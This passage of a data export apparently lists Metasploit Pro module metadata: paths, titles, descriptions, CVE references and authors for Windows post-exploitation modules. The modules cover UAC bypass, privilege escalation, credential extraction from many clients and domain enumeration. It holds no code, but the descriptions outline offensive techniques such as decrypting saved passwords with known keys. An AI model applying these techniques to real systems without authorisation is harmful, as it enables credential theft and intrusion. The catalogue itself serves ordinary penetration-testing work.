It will spawn a second shell that has the UAC flag turned off.","Metasploit Framework License (BSD)","f","2010-12-31 00:00:00",,,,"t","URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/","David Kennedy ""ReL1K"" , mitnick" 1883,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/droplnk.rb","post","windows/escalate/droplnk","post/windows/escalate/droplnk","Windows Escalate SMB Icon LNK Dropper",300,"This module drops a shortcut (LNK file) that has a ICON reference existing on the specified remote host, causing SMB and WebDAV connections to be initiated from any user that views the shortcut.","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 1884,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/getsystem.rb","post","windows/escalate/getsystem","post/windows/escalate/getsystem","Windows Escalate Get System via Administrator",300,"This module uses the builtin 'getsystem' command to escalate the current session to the SYSTEM account from an administrator user account.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 1885,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/ms10_073_kbdlayout.rb","post","windows/escalate/ms10_073_kbdlayout","post/windows/escalate/ms10_073_kbdlayout","Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation",300,"This module exploits the keyboard layout vulnerability exploited by Stuxnet. When processing specially crafted keyboard layout files (DLLs), the Windows kernel fails to validate that an array index is within the bounds of the array. 
By loading a specially crafted keyboard layout, an attacker can execute code in Ring 0.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",,,,"t","CVE-2010-2743, EDB-15985, MSB-MS10-073, OSVDB-68552, URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1, URL-http://www.vupen.com/blog/20101018.Stuxnet_Win32k_Windows_Kernel_0Day_Exploit_CVE-2010-2743.php","Ruben Santamarta, jduck " 1886,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/ms10_092_schelevator.rb","post","windows/escalate/ms10_092_schelevator","post/windows/escalate/ms10_092_schelevator","Windows Escalate Task Scheduler XML Privilege Escalation",300,"This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. NOTE: Thanks to webDEViL for the information about disable/enable.","Metasploit Framework License (BSD)","f","2010-09-13 00:00:00",,,,"t","BID-44357, CVE-2010-3338, EDB-15589, MSB-MS10-092, OSVDB-68518","jduck " 1887,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/net_runtime_modify.rb","post","windows/escalate/net_runtime_modify","post/windows/escalate/net_runtime_modify","Windows Escalate Microsoft .NET Runtime Optimization Service Privilege Escalation",300,"This module attempts to exploit the security permissions set on the .NET Runtime Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0. 
The permissions on this service allow domain users and local power users to modify the mscorsvw.exe binary.","Metasploit Framework License (BSD)","f",,,,,"t","EDB-16940, OSVDB-71013","bannedit " 1888,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/screen_unlock.rb","post","windows/escalate/screen_unlock","post/windows/escalate/screen_unlock","Windows Escalate Locked Desktop Unlocker",300,"This module unlocks a locked Windows desktop by patching the respective code inside the LSASS.exe process. This patching process can result in the target system hanging or even rebooting, so be careful when using this module on production systems.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://www.storm.net.nz/projects/16","L4teral , Metlstorm" 1889,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/service_permissions.rb","post","windows/escalate/service_permissions","post/windows/escalate/service_permissions","Windows Escalate Service Permissions Local Privilege Escalation",300,"This module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure file or configuration permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload. This will result in a new session when this succeeds. 
If the module is able to modify the service but does not have permission to start and stop the affected service, the attacker must wait for the system to restart before a session will be created.","Metasploit Framework License (BSD)","f",,,,,"t",,"scriptjunkie"
1890,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/arp_scanner.rb","post","windows/gather/arp_scanner","post/windows/gather/arp_scanner","Windows Gather ARP Scanner",300,"This module will perform an ARP scan for a given IP range through a Meterpreter session.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez "
1891,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/bitcoin_jacker.rb","post","windows/gather/bitcoin_jacker","post/windows/gather/bitcoin_jacker","Windows Gather Bitcoin wallet.dat",300,"This module downloads any Bitcoin wallet.dat files from the target system.","Metasploit Framework License (BSD)","f",,,,,"t",,"illwill "
1892,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/cachedump.rb","post","windows/gather/cachedump","post/windows/gather/cachedump","Windows Gather Credential Cache Dump",300,"This module uses the registry to extract the stored domain hashes that have been cached as a result of a GPO setting. The default setting on Windows is to store the last ten successful logins.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://lab.mediaservice.net/code/cachedump.rb","Maurizio Agazzini , mubix "
1893,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/checkvm.rb","post","windows/gather/checkvm","post/windows/gather/checkvm","Windows Gather Virtual Environment Detection",300,"This module attempts to determine whether the system is running inside of a virtual environment and, if so, which one. This module supports detection of Hyper-V, VMware, Virtual PC, VirtualBox, Xen, and QEMU.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez "
1894,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/bulletproof_ftp.rb","post","windows/gather/credentials/bulletproof_ftp","post/windows/gather/credentials/bulletproof_ftp","Windows Gather BulletProof FTP Client Saved Password Extraction",300,"This module extracts information from BulletProof FTP Bookmarks files and stores the retrieved credentials in the database.","Metasploit Framework License (BSD)","f",,,,,"t",,"juan vazquez "
1895,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/coreftp.rb","post","windows/gather/credentials/coreftp","post/windows/gather/credentials/coreftp","Windows Gather CoreFTP Saved Password Extraction",300,"This module extracts saved passwords from the CoreFTP FTP client. These passwords are stored in the registry. They are encrypted with AES-128-ECB. This module extracts and decrypts these passwords.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine "
1896,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/credential_collector.rb","post","windows/gather/credentials/credential_collector","post/windows/gather/credentials/credential_collector","Windows Gather Credential Collector",300,"This module harvests credentials found on the host and stores them in the database.","Metasploit Framework License (BSD)","f",,,,,"t",,"tebo "
1897,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/dyndns.rb","post","windows/gather/credentials/dyndns","post/windows/gather/credentials/dyndns","Windows Gather Dyn-Dns Client Password Extractor",300,"This module extracts the username, password, and hosts for Dyn-Dns version 4.1.8. This is done by downloading the config.dyndns file from the victim machine and then automatically decoding the password field. The original copy of the config file is also saved to disk.","Metasploit Framework License (BSD)","f",,,,,"t",,"Shubham Dawra , sinn3r "
1898,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/enum_cred_store.rb","post","windows/gather/credentials/enum_cred_store","post/windows/gather/credentials/enum_cred_store","Windows Gather Credential Store Enumeration and Decryption Module",300,"This module will enumerate the Microsoft Credential Store and decrypt the credentials. This module can only access credentials created by the user the process is running as. It cannot decrypt Domain Network Passwords, but will display the username and location.","Metasploit Framework License (BSD)","f",,,,,"t",,"Kx499"
1899,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/enum_picasa_pwds.rb","post","windows/gather/credentials/enum_picasa_pwds","post/windows/gather/credentials/enum_picasa_pwds","Windows Gather Google Picasa Password Extractor",300,"This module extracts and decrypts the login passwords stored by Google Picasa.","Metasploit Framework License (BSD)","f",,,,,"t",,"SecurityXploded Team, Sil3ntDre4m "
1900,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/epo_sql.rb","post","windows/gather/credentials/epo_sql","post/windows/gather/credentials/epo_sql","Windows Gather McAfee ePO 4.6 Config SQL Credentials",300,"This module extracts connection details and decrypts the saved password for the SQL database in use by a McAfee ePO 4.6 server. The passwords are stored in a config file. They are encrypted with AES-128-ECB and a static key.","Metasploit Framework License (BSD)","f",,,,,"t",,"Nathan Einwechter "
1901,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/filezilla_server.rb","post","windows/gather/credentials/filezilla_server","post/windows/gather/credentials/filezilla_server","Windows Gather FileZilla FTP Server Credential Collection",300,"This module will collect credentials from the FileZilla FTP server if installed.","Metasploit Framework License (BSD)","f",,,,,"t",,"bannedit "
1902,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/flashfxp.rb","post","windows/gather/credentials/flashfxp","post/windows/gather/credentials/flashfxp","Windows Gather FlashFXP Saved Password Extraction",300,"This module extracts weakly encrypted saved FTP passwords from FlashFXP. It finds saved FTP connections in the Sites.dat file.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine "
1903,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/ftpnavigator.rb","post","windows/gather/credentials/ftpnavigator","post/windows/gather/credentials/ftpnavigator","Windows Gather FTP Navigator Saved Password Extraction",300,"This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine "
1904,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/ftpx.rb","post","windows/gather/credentials/ftpx","post/windows/gather/credentials/ftpx","Windows Gather FTP Explorer (FTPX) Credential Extraction",300,"This module finds saved login credentials for the FTP Explorer (FTPx) FTP client for Windows.","Metasploit Framework License (BSD)","f",,,,,"t",,"Brendan Coles "
1905,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/gpp.rb","post","windows/gather/credentials/gpp","post/windows/gather/credentials/gpp","Windows Gather Group Policy Preference Saved Passwords",300,"This module enumerates the victim machine's domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft's published AES key. Tested on WinXP SP3 Client and Win2k8 R2 DC.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx, URL-http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences, URL-http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13), URL-http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html","Ben Campbell , Loic Jaquemet , mubix , scriptmonkey , theLightCosine "
1906,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/idm.rb","post","windows/gather/credentials/idm","post/windows/gather/credentials/idm","Windows Gather Internet Download Manager (IDM) Password Extractor",300,"This module recovers the saved premium download account passwords from Internet Download Manager (IDM). These passwords are stored in an encoded format in the registry. This module traverses these registry entries and decodes them. Thanks to the template code of theLightCosine's CoreFTP password module.","Metasploit Framework License (BSD)","f",,,,,"t",,"SecurityXploded Team , sil3ntdre4m "
1907,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/imail.rb","post","windows/gather/credentials/imail","post/windows/gather/credentials/imail","Windows Gather IPSwitch iMail User Data Enumeration",300,"This module will collect iMail user data such as the username, domain, full name, e-mail, and the decoded password. Please note that if IMAILUSER is specified, the module extracts user data from all the domains found. If IMAILDOMAIN is specified, then it will extract all user data under that particular category.","Metasploit Framework License (BSD)","f",,,,,"t","EDB-11331","sinn3r "
1908,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/imvu.rb","post","windows/gather/credentials/imvu","post/windows/gather/credentials/imvu","Windows Gather Credentials IMVU Game Client",300,"This module extracts the account username and password from the IMVU game client and stores them as loot.","Metasploit Framework License (BSD)","f",,,,,"t",,"Shubham Dawra "
1909,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/meebo.rb","post","windows/gather/credentials/meebo","post/windows/gather/credentials/meebo","Windows Gather Meebo Password Extractor",300,"This module extracts the login account password stored by Meebo Notifier, a desktop version of Meebo's Online Messenger.","Metasploit Framework License (BSD)","f",,,,,"t",,"SecurityXploded Team , Sil3ntDre4m "
1910,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/mremote.rb","post","windows/gather/credentials/mremote","post/windows/gather/credentials/mremote","Windows Gather mRemote Saved Password Extraction",300,"This module extracts saved passwords from mRemote. mRemote stores connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves the passwords in an encrypted format. The module will extract the connection info and decrypt the saved passwords.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , mubix , theLightCosine "
1911,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/nimbuzz.rb","post","windows/gather/credentials/nimbuzz","post/windows/gather/credentials/nimbuzz","Windows Gather Nimbuzz Instant Messenger Password Extractor",300,"This module extracts the account passwords saved by Nimbuzz Instant Messenger in hex format.","Metasploit Framework License (BSD)","f",,,,,"t",,"SecurityXploded Team, sil3ntdre4m "
1912,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/outlook.rb","post","windows/gather/credentials/outlook","post/windows/gather/credentials/outlook","Windows Gather Microsoft Outlook Saved Password Extraction",300,"This module extracts and decrypts saved Microsoft Outlook (versions 2002-2010) passwords from the Windows Registry for POP3/IMAP/SMTP/HTTP accounts. In order for decryption to be successful, this module must be executed under the same privileges as the user which originally encrypted the password.","Metasploit Framework License (BSD)","f",,,,,"t",,"Justin Cacak"
1913,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/razer_synapse.rb","post","windows/gather/credentials/razer_synapse","post/windows/gather/credentials/razer_synapse","Razer Synapse Password Extraction",300,"This module will enumerate passwords stored by the Razer Synapse client. The encryption key and IV are publicly known. This module will not only extract the encrypted password but will also decrypt it using that publicly known key. Affects versions earlier than 1.7.15.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://www.pentestgeek.com/2013/01/16/hard-coded-encryption-keys-and-more-wordpress-fun/, URL-https://github.com/pasv/Testing/blob/master/Razer_decode.py","Brandon McCann ""zeknox"" , Matt Howard ""pasv"" , Thomas McCarthy ""smilingraccoon"" "
1914,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/razorsql.rb","post","windows/gather/credentials/razorsql","post/windows/gather/credentials/razorsql","Windows Gather RazorSQL Credentials",300,"This module stores the username, password, type, host, port, database (and name) collected from the profiles.txt file of RazorSQL.","Metasploit Framework License (BSD)","f",,,,,"t",,"Paul Rascagneres , sinn3r "
1915,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/smartftp.rb","post","windows/gather/credentials/smartftp","post/windows/gather/credentials/smartftp","Windows Gather SmartFTP Saved Password Extraction",300,"This module finds saved login credentials for the SmartFTP FTP client for Windows. It finds the saved passwords and decrypts them.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine "
1916,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/spark_im.rb","post","windows/gather/credentials/spark_im","post/windows/gather/credentials/spark_im","Windows Gather Spark IM Password Extraction",300,"This module will enumerate passwords stored by the Spark IM client. The encryption key is publicly known. This module will not only extract the encrypted password but will also decrypt it using that publicly known key.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/","Brandon McCann ""zeknox"" , Thomas McCarthy ""smilingraccoon"" "
1917,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/steam.rb","post","windows/gather/credentials/steam","post/windows/gather/credentials/steam","Steam Client Session Collector.",300,"This module will collect Steam session information from an account set to autologin.","Metasploit Framework License (BSD)","f",,,,,"t",,"Nikolai Rusakov "
1918,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/tortoisesvn.rb","post","windows/gather/credentials/tortoisesvn","post/windows/gather/credentials/tortoisesvn","Windows Gather TortoiseSVN Saved Password Extraction",300,"This module extracts and decrypts saved TortoiseSVN passwords. In order for decryption to be successful, this module must be executed under the same privileges as the user which originally encrypted the password.","Metasploit Framework License (BSD)","f",,,,,"t",,"Justin Cacak"
1919,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/total_commander.rb","post","windows/gather/credentials/total_commander","post/windows/gather/credentials/total_commander","Windows Gather Total Commander Saved Password Extraction",300,"This module extracts weakly encrypted saved FTP passwords from Total Commander. It finds saved FTP connections in the wcx_ftp.ini file.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine "
1920,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/trillian.rb","post","windows/gather/credentials/trillian","post/windows/gather/credentials/trillian","Windows Gather Trillian Password Extractor",300,"This module extracts account passwords from the Trillian and Trillian Astra v4.x-5.x instant messengers.","Metasploit Framework License (BSD)","f",,,,,"t",,"SecurityXploded Team, Sil3ntDre4m "
1921,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/vnc.rb","post","windows/gather/credentials/vnc","post/windows/gather/credentials/vnc","Windows Gather VNC Password Extraction",300,"This module extracts DES-encrypted passwords from known VNC locations.","Metasploit Framework License (BSD)","f",,,,,"t",,"Kurt Grutzmacher , mubix "
1922,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/windows_autologin.rb","post","windows/gather/credentials/windows_autologin","post/windows/gather/credentials/windows_autologin","Windows Gather AutoLogin User Credential Extractor",300,"This module extracts the plain-text Windows user login password from the Registry. It exploits a Windows feature (Windows 2000 to 2008 R2) that allows a user or third-party Windows utility tools to configure user AutoLogin by inserting the plain-text password into the (Alt)DefaultPassword value under HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon. This key is readable by all users.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://core.yehg.net/lab/#tools.exploits, URL-http://support.microsoft.com/kb/315231","Myo Soe "
1923,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/winscp.rb","post","windows/gather/credentials/winscp","post/windows/gather/credentials/winscp","Windows Gather WinSCP Saved Password Extraction",300,"This module extracts weakly encrypted saved passwords from WinSCP. It searches for saved sessions in the Windows Registry and the WinSCP.ini file. It cannot decrypt passwords if a master password is used.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine "
1924,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/wsftp_client.rb","post","windows/gather/credentials/wsftp_client","post/windows/gather/credentials/wsftp_client","Windows Gather WS_FTP Saved Password Extraction",300,"This module extracts weakly encrypted saved FTP passwords from WS_FTP. It finds saved FTP connections in the ws_ftp.ini file.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine "
1925,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/dumplinks.rb","post","windows/gather/dumplinks","post/windows/gather/dumplinks","Windows Gather Dump Recent Files lnk Info",300,"The dumplinks module is a modified port of Harlan Carvey's lslnk.pl Perl script. This module will parse .lnk files from a user's Recent Documents folder and Microsoft Office's Recent Documents folder, if present. Windows creates these link files automatically for many common file types. The .lnk files contain time stamps, file locations including share names, volume serial numbers, and more.","Metasploit Framework License (BSD)","f",,,,,"t",,"davehull "
1926,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_ad_computers.rb","post","windows/gather/enum_ad_computers","post/windows/gather/enum_ad_computers","Windows Gather AD Enumerate Computers",300,"This module will enumerate computers in the default AD directory. Optional Attributes: objectClass, cn, description, distinguishedName, instanceType, whenCreated, whenChanged, uSNCreated, uSNChanged, name, objectGUID, userAccountControl, badPwdCount, codePage, countryCode, badPasswordTime, lastLogoff, lastLogon, localPolicyFlags, pwdLastSet, primaryGroupID, objectSid, accountExpires, logonCount, sAMAccountName, sAMAccountType, operatingSystem, operatingSystemVersion, operatingSystemServicePack, serverReferenceBL, dNSHostName, rIDSetPreferences, servicePrincipalName, objectCategory, netbootSCPBL, isCriticalSystemObject, frsComputerReferenceBL, lastLogonTimestamp, msDS-SupportedEncryptionTypes","Metasploit Framework License (BSD)","f",,,,,"t",,"Ben Campbell "
1927,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_applications.rb","post","windows/gather/enum_applications","post/windows/gather/enum_applications","Windows Gather Installed Application Enumeration",300,"This module will enumerate all installed applications.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez "
1928,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_artifacts.rb","post","windows/gather/enum_artifacts","post/windows/gather/enum_artifacts","Windows Gather File and Registry Artifacts Enumeration",300,"This module will check the file system and registry for particular artifacts. The list of artifacts is read from data/post/enum_artifacts_list.txt or a user-specified file. Any matches are written to the loot.","Metasploit Framework License (BSD)","f",,,,,"t",,"averagesecurityguy "
1929,"2013-05-16 16:06:27","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_chrome.rb","post","windows/gather/enum_chrome","post/windows/gather/enum_chrome","Windows Gather Google Chrome User Data Enumeration",300,"This module will collect user data from Google Chrome and attempt to decrypt sensitive information.","Metasploit Framework License (BSD)","f",,,,,"t",,"Kx499, Sven Taute, mubix , sinn3r "
1930,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_computers.rb","post","windows/gather/enum_computers","post/windows/gather/enum_computers","Windows Gather Enumerate Computers",300,"This module will enumerate computers included in the primary Domain.","Metasploit Framework License (BSD)","f",,,,,"t",,"Joshua Abraham "
1931,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_db.rb","post","windows/gather/enum_db","post/windows/gather/enum_db","Windows Gather Database Instance Enumeration",300,"This module will enumerate a Windows system for installed database instances.","Metasploit Framework License (BSD)","f",,,,,"t",,"Barry Shteiman , juan vazquez "
1932,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_devices.rb","post","windows/gather/enum_devices","post/windows/gather/enum_devices","Windows Gather Hardware Enumeration",300,"Enumerate PCI hardware information from the registry. Please note this script will run through registry subkeys such as: 'PCI', 'ACPI', 'ACPI_HAL', 'FDC', 'HID', 'HTREE', 'IDE', 'ISAPNP', 'LEGACY', 'LPTENUM', 'PCIIDE', 'SCSI', 'STORAGE', 'SW', and 'USB'; it will take time to finish. It is recommended to run this module as a background job.","Metasploit Framework License (BSD)","f",,,,,"t",,"Brandon Perry "
1933,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_dirperms.rb","post","windows/gather/enum_dirperms","post/windows/gather/enum_dirperms","Windows Gather Directory Permissions Enumeration",300,"This module enumerates directories and lists the permissions set on found directories. Please note: if the PATH option isn't specified, then the module will start enumerating whatever is in the target machine's %PATH% variable.","Metasploit Framework License (BSD)","f",,,,,"t",,"Ben Campbell , Kx499, sinn3r "
1934,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_domain.rb","post","windows/gather/enum_domain","post/windows/gather/enum_domain","Windows Gather Enumerate Domain",300,"This module identifies the primary domain via the registry. The registry value used is: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\DCName.","Metasploit Framework License (BSD)","f",,,,,"t",,"Joshua Abraham "
1935,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_domain_group_users.rb","post","windows/gather/enum_domain_group_users","post/windows/gather/enum_domain_group_users","Windows Gather Enumerate Domain Group",300,"This module extracts user accounts from the specified group and stores the results in the loot. It will also verify whether the session account is in the group. Data is stored in loot in a format that is compatible with the token_hunter plugin. This module should be run over a session with domain credentials.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , Stephen Haywood "
1936,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_domain_tokens.rb","post","windows/gather/enum_domain_tokens","post/windows/gather/enum_domain_tokens","Windows Gather Enumerate Domain Tokens",300,"This module will enumerate tokens present on a system that belong to the domain the target host is a member of. It will also enumerate users in the local Administrators, Users and Backup Operators groups to identify domain members, and enumerate processes to check whether they are running under a domain account. In all of these checks, the accounts, processes and tokens are checked for membership of the Domain Admins group of the domain the machine is a member of.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez "
1937,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_domains.rb","post","windows/gather/enum_domains","post/windows/gather/enum_domains","Windows Gather Domain Enumeration",300,"This module enumerates the domains a host can currently see and the domain controllers for each of those domains.","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix "
1938,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_files.rb","post","windows/gather/enum_files","post/windows/gather/enum_files","Windows Gather Generic File Collection",300,"This module downloads files recursively based on the FILE_GLOBS option.","Metasploit Framework License (BSD)","f",,,,,"t",,"3vi1john , RageLtMan "
1939,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_hostfile.rb","post","windows/gather/enum_hostfile","post/windows/gather/enum_hostfile","Windows Gather Windows Host File Enumeration",300,"This module returns a list of entries in the target system's hosts file.","BSD License","f",,,,,"t",,"vt "
1940,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_ie.rb","post","windows/gather/enum_ie","post/windows/gather/enum_ie","Windows Gather Internet Explorer User Data Enumeration",300,"This module will collect history, cookies, and credentials (from either HTTP auth passwords, or saved form passwords found in auto-complete) in Internet Explorer. The ability to gather credentials is only supported for versions of IE >=7, while history and cookies can be extracted for all versions.","Metasploit Framework License (BSD)","f",,,,,"t",,"Kx499"
1941,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_logged_on_users.rb","post","windows/gather/enum_logged_on_users","post/windows/gather/enum_logged_on_users","Windows Gather Logged On User Enumeration (Registry)",300,"This module will enumerate current and recently logged on Windows users.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez "
1942,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_ms_product_keys.rb","post","windows/gather/enum_ms_product_keys","post/windows/gather/enum_ms_product_keys","Windows Gather Product Key",300,"This module will enumerate the OS license key.","Metasploit Framework License (BSD)","f",,,,,"t",,"Brandon Perry "
1943,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_powershell_env.rb","post","windows/gather/enum_powershell_env","post/windows/gather/enum_powershell_env","Windows Gather Powershell Environment Setting Enumeration",300,"This module will enumerate Microsoft PowerShell settings.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez "
1944,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_proxy.rb","post","windows/gather/enum_proxy","post/windows/gather/enum_proxy","Windows Gather Proxy Setting",300,"This module pulls a user's proxy settings. If neither RHOST nor SID is set, it pulls the current user's settings; otherwise it pulls the settings of the specified SID on the target host.","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix "
1945,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_services.rb","post","windows/gather/enum_services","post/windows/gather/enum_services","Windows Gather Service Info Enumeration",300,"This module will query the system for services and display the name and configuration info for each returned service. It allows you to optionally search the credentials, path, or start type for a string and only return the results that match. These query operations are cumulative, and if no query strings are specified, it just returns all services. NOTE: If the script hangs, Windows Firewall is most likely on and you did not migrate to a safe process (explorer.exe for example).","Metasploit Framework License (BSD)","f",,,,,"t",,"Keith Faber, Kx499"
1946,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_shares.rb","post","windows/gather/enum_shares","post/windows/gather/enum_shares","Windows Gather SMB Share Enumeration via Registry",300,"This module will enumerate configured and recently used file shares.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez "
1947,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/enum_snmp.rb","post","windows/gather/enum_snmp","post/windows/gather/enum_snmp","Windows Gather SNMP Settings Enumeration (Registry)",300,"This module will enumerate the SNMP service configuration.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , Tebo "
